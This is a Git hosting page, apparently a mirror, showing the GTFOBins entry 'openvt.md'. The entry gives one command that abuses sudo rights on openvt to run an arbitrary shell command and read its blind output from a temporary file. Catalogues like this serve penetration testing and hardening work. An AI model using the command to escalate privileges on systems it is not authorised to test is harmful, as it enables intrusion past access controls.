This website requires JavaScript.
Explore
Help
Sign In
public-mirrors
/
GTFOBins.github.io
Watch
1
Star
0
Fork
0
You've already forked GTFOBins.github.io
mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced
2025-10-31 16:58:36 +01:00
Code
Issues
Projects
Releases
Wiki
Activity
Files
02909240b59685a36d05710352452bda36bfd5d1
GTFOBins.github.io
/
_gtfobins
/
openvt.md
Andrea Cardaci
717acf4b14
Fix openvt
2021-01-21 14:49:32 +01:00
295 B
Raw
Blame
History
functions
functions
sudo
description
code
The command execution is blind (displayed on the virtual console), but it is possible to save the output on a temporary file.
COMMAND=id TF=$(mktemp -u) sudo openvt -- sh -c "$COMMAND >$TF 2>&1" cat $TF
Reference in New Issue
View Git Blame
Copy Permalink